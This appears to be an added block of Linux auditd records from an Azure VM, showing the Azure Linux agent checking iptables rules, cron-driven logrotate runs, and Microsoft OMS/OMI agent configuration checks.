+type=PROCTITLE msg=audit(1551487490.054:849): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=SYSCALL msg=audit(1551487495.066:850): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0662d070 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19276 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487495.066:850): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487495.066:850): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487495.066:850): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487495.066:850): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487495.066:850): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487495.066:851): arch=c000003e syscall=59 success=yes exit=0 a0=55db9607abb8 a1=55db9607ab70 a2=55db9607ab88 a3=7fbf035a3810 items=2 ppid=19276 pid=19277 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487495.066:851): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487495.066:851): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487495.066:851): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487495.066:851): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487495.066:851): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487495.066:852): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0662d070 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19278 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487495.066:852): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487495.066:852): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487495.066:852): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487495.066:852): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487495.066:852): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487495.070:853): arch=c000003e syscall=59 success=yes exit=0 a0=55d1d71a27e0 a1=55d1d71a2728 a2=55d1d71a27b0 a3=7f39e0ae4810 items=2 ppid=19278 pid=19279 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487495.070:853): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487495.070:853): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487495.070:853): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487495.070:853): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487495.070:853): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=SYSCALL msg=audit(1551487500.078:854): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0662d830 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19281 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487500.078:854): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487500.078:854): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487500.078:854): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487500.078:854): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487500.078:854): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487500.078:855): arch=c000003e syscall=59 success=yes exit=0 a0=560d649cbbb8 a1=560d649cbb70 a2=560d649cbb88 a3=7f0efd644810 items=2 ppid=19281 pid=19282 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487500.078:855): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487500.078:855): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487500.078:855): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487500.078:855): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487500.078:855): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487500.082:856): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0662d830 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19283 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487500.082:856): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487500.082:856): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487500.082:856): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487500.082:856): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487500.082:856): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487500.082:857): arch=c000003e syscall=59 success=yes exit=0 a0=55873d2667e0 a1=55873d266728 a2=55873d2667b0 a3=7f714cbb8810 items=2 ppid=19283 pid=19284 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487500.082:857): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487500.082:857): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487500.082:857): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487500.082:857): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487500.082:857): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=USER_ACCT msg=audit(1551487501.406:858): pid=19286 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="omsagent" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551487501.406:859): pid=19286 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="omsagent" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551487501.406:860): pid=19286 uid=0 subj==unconfined old-auid=4294967295 auid=998 tty=(none) old-ses=4294967295 ses=287 res=1
+type=USER_ACCT msg=audit(1551487501.406:861): pid=19285 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551487501.406:862): pid=19285 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551487501.406:863): pid=19285 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=288 res=1
+type=USER_START msg=audit(1551487501.406:864): pid=19286 uid=0 auid=998 ses=287 subj==unconfined msg='op=PAM:session_open acct="omsagent" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_START msg=audit(1551487501.406:865): pid=19285 uid=0 auid=0 ses=288 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551487501.410:866): pid=19288 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551487501.410:867): pid=19288 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551487501.410:868): pid=19288 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=289 res=1
+type=USER_ACCT msg=audit(1551487501.410:869): pid=19287 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551487501.410:870): pid=19287 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_START msg=audit(1551487501.410:871): pid=19288 uid=0 auid=0 ses=289 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551487501.410:872): pid=19287 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=290 res=1
+type=USER_START msg=audit(1551487501.410:873): pid=19287 uid=0 auid=0 ses=290 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=SYSCALL msg=audit(1551487501.410:874): arch=c000003e syscall=59 success=yes exit=0 a0=55bc3be5df06 a1=7fff576f64f0 a2=55bc3be5dfb0 a3=7fff576f6590 items=2 ppid=19285 pid=19290 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=288 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=SYSCALL msg=audit(1551487501.414:875): arch=c000003e syscall=59 success=yes exit=0 a0=55bc3be5ddf6 a1=7fff576f64f0 a2=55bc3be5dea0 a3=7fff576f6590 items=2 ppid=19287 pid=19292 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=290 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.414:875): argc=3 a0="/bin/sh" a1="-c" a2=2F7573722F7362696E2F6C6F67726F74617465202F6574632F6C6F67726F746174652E642F6F6D736167656E742A203E2F6465762F6E756C6C20323E2631
+type=CWD msg=audit(1551487501.414:875): cwd="/root"
+type=PATH msg=audit(1551487501.414:875): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.414:875): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.414:875): proctitle=2F62696E2F7368002D63002F7573722F7362696E2F6C6F67726F74617465202F6574632F6C6F67726F746174652E642F6F6D736167656E742A203E2F6465762F6E756C6C20323E2631
+type=EXECVE msg=audit(1551487501.410:874): argc=3 a0="/bin/sh" a1="-c" a2=2F7573722F7362696E2F6C6F67726F74617465202F6574632F6C6F67726F746174652E642F6F6D69203E2F6465762F6E756C6C20323E2631
+type=CWD msg=audit(1551487501.410:874): cwd="/root"
+type=PATH msg=audit(1551487501.410:874): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.410:874): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=SYSCALL msg=audit(1551487501.414:876): arch=c000003e syscall=59 success=yes exit=0 a0=55bc3be5e516 a1=7fff576f64f0 a2=55bc3be5e5d0 a3=7fff576f6590 items=2 ppid=19286 pid=19289 auid=998 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=287 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.414:876): argc=3 a0="/bin/sh" a1="-c" a2=2F6F70742F6F6D692F62696E2F4F4D53436F6E73697374656E6379496E766F6B6572203E2F6465762F6E756C6C20323E2631
+type=CWD msg=audit(1551487501.414:876): cwd="/var/opt/microsoft/omsagent/335208fd-8b1d-4dca-a69b-67608d94de5c/run"
+type=PATH msg=audit(1551487501.414:876): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.414:876): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.414:876): proctitle=2F62696E2F7368002D63002F6F70742F6F6D692F62696E2F4F4D53436F6E73697374656E6379496E766F6B6572203E2F6465762F6E756C6C20323E2631
+type=SYSCALL msg=audit(1551487501.414:877): arch=c000003e syscall=59 success=yes exit=0 a0=562f69306bc8 a1=562f69306c78 a2=562f6a61d478 a3=7fdf3cc0e810 items=2 ppid=19292 pid=19293 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=290 comm="logrotate" exe="/usr/sbin/logrotate" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.414:877): argc=2 a0="/usr/sbin/logrotate" a1="/etc/logrotate.d/omsagent-335208fd-8b1d-4dca-a69b-67608d94de5c"
+type=CWD msg=audit(1551487501.414:877): cwd="/root"
+type=PATH msg=audit(1551487501.414:877): item=0 name="/usr/sbin/logrotate" inode=13092 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.414:877): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.414:877): proctitle=2F7573722F7362696E2F6C6F67726F74617465002F6574632F6C6F67726F746174652E642F6F6D736167656E742D33333532303866642D386231642D346463612D613639622D363736303864393464653563
+type=PROCTITLE msg=audit(1551487501.410:874): proctitle=2F62696E2F7368002D63002F7573722F7362696E2F6C6F67726F74617465202F6574632F6C6F67726F746174652E642F6F6D69203E2F6465762F6E756C6C20323E2631
+type=SYSCALL msg=audit(1551487501.418:878): arch=c000003e syscall=59 success=yes exit=0 a0=55bc3be5e246 a1=7fff576f64f0 a2=55bc3be5e2f0 a3=7fff576f6590 items=2 ppid=19288 pid=19291 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=289 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=SYSCALL msg=audit(1551487501.418:879): arch=c000003e syscall=59 success=yes exit=0 a0=557919674b98 a1=557919674bd8 a2=557919674c08 a3=7f6cd0c97810 items=2 ppid=19289 pid=19294 auid=998 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=287 comm="OMSConsistencyI" exe="/opt/microsoft/omsconfig/bin/OMSConsistencyInvoker" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.418:878): argc=3 a0="/bin/sh" a1="-c" a2=5B202D66202F6574632F6B7262352E6B6579746162205D202626205B205C282021202D66202F6574632F6F70742F6F6D692F63726564732F6F6D692E6B6579746162205C29202D6F205C28202F6574632F6B7262352E6B6579746162202D6E74202F6574632F6F70742F6F6D692F63726564732F6F6D692E6B6579746162205C29205D202626202F6F70742F6F6D692F62696E2F737570706F72742F6B747374726970202F6574632F6B7262352E6B6579746162202F6574632F6F70742F6F6D692F63726564732F6F6D692E6B6579746162203E2F6465762F6E756C6C20323E2631207C7C2074727565
+type=CWD msg=audit(1551487501.418:878): cwd="/root"
+type=PATH msg=audit(1551487501.418:878): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.418:878): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.418:878): proctitle=2F62696E2F7368002D63005B202D66202F6574632F6B7262352E6B6579746162205D202626205B205C282021202D66202F6574632F6F70742F6F6D692F63726564732F6F6D692E6B6579746162205C29202D6F205C28202F6574632F6B7262352E6B6579746162202D6E74202F6574632F6F70742F6F6D692F63726564732F6F
+type=CRED_DISP msg=audit(1551487501.422:880): pid=19288 uid=0 auid=0 ses=289 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=EXECVE msg=audit(1551487501.418:879): argc=1 a0="/opt/omi/bin/OMSConsistencyInvoker"
+type=CWD msg=audit(1551487501.418:879): cwd="/var/opt/microsoft/omsagent/335208fd-8b1d-4dca-a69b-67608d94de5c/run"
+type=PATH msg=audit(1551487501.418:879): item=0 name="/opt/omi/bin/OMSConsistencyInvoker" inode=266456 dev=08:01 mode=0100755 ouid=998 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.418:879): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.418:879): proctitle="/opt/omi/bin/OMSConsistencyInvoker"
+type=USER_END msg=audit(1551487501.422:881): pid=19288 uid=0 auid=0 ses=289 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=SYSCALL msg=audit(1551487501.422:882): arch=c000003e syscall=59 success=yes exit=0 a0=55639f1fabc0 a1=55639f1fac18 a2=55639f1fac50 a3=7efde14cf810 items=2 ppid=19290 pid=19296 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=288 comm="logrotate" exe="/usr/sbin/logrotate" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.422:882): argc=2 a0="/usr/sbin/logrotate" a1="/etc/logrotate.d/omi"
+type=SYSCALL msg=audit(1551487501.422:883): arch=c000003e syscall=59 success=yes exit=0 a0=7fd16a9bfe9a a1=7fffe4f923f0 a2=7fffe4f926c8 a3=8 items=2 ppid=19294 pid=19297 auid=998 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=287 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.422:883): argc=3 a0="sh" a1="-c" a2=707974686F6E202F6F70742F6D6963726F736F66742F6F6D73636F6E6669672F536372697074732F506572666F726D5265717569726564436F6E66696775726174696F6E436865636B732E7079
+type=CWD msg=audit(1551487501.422:883): cwd="/var/opt/microsoft/omsagent/335208fd-8b1d-4dca-a69b-67608d94de5c/run"
+type=PATH msg=audit(1551487501.422:883): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.422:883): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.422:883): proctitle=7368002D6300707974686F6E202F6F70742F6D6963726F736F66742F6F6D73636F6E6669672F536372697074732F506572666F726D5265717569726564436F6E66696775726174696F6E436865636B732E7079
+type=CWD msg=audit(1551487501.422:882): cwd="/root"
+type=PATH msg=audit(1551487501.422:882): item=0 name="/usr/sbin/logrotate" inode=13092 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=SYSCALL msg=audit(1551487501.422:884): arch=c000003e syscall=59 success=yes exit=0 a0=5577d7e3ec20 a1=5577d7e3ebd0 a2=5577d7e3ebe8 a3=7f6dd4f75810 items=2 ppid=19297 pid=19298 auid=998 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=287 comm="python" exe="/usr/bin/python2.7" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487501.422:884): argc=2 a0="python" a1="/opt/microsoft/omsconfig/Scripts/PerformRequiredConfigurationChecks.py"
+type=CWD msg=audit(1551487501.422:884): cwd="/var/opt/microsoft/omsagent/335208fd-8b1d-4dca-a69b-67608d94de5c/run"
+type=PATH msg=audit(1551487501.422:884): item=0 name="/usr/bin/python" inode=64177 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487501.422:884): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.422:884): proctitle=707974686F6E002F6F70742F6D6963726F736F66742F6F6D73636F6E6669672F536372697074732F506572666F726D5265717569726564436F6E66696775726174696F6E436865636B732E7079
+type=PATH msg=audit(1551487501.422:882): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487501.422:882): proctitle=2F7573722F7362696E2F6C6F67726F74617465002F6574632F6C6F67726F746174652E642F6F6D69
+type=CRED_DISP msg=audit(1551487501.438:885): pid=19287 uid=0 auid=0 ses=290 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551487501.438:886): pid=19287 uid=0 auid=0 ses=290 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551487501.438:887): pid=19285 uid=0 auid=0 ses=288 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551487501.438:888): pid=19285 uid=0 auid=0 ses=288 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=SYSCALL msg=audit(1551487501.446:889): arch=c000003e syscall=59 success=yes exit=0 a0=560f19ad1160 a1=560f19a7d7c0 a2=7ffcb8fe9140 a3=560f18303680 items=2 ppid=19298 pid=19299 auid=998 uid=998 gid=999 euid=998 suid=998 fsuid=998 egid=999 sgid=999 fsgid=999 tty=(none) ses=287 comm="omicli" exe="/opt/omi/bin/omicli" subj==unconfined key=(null)
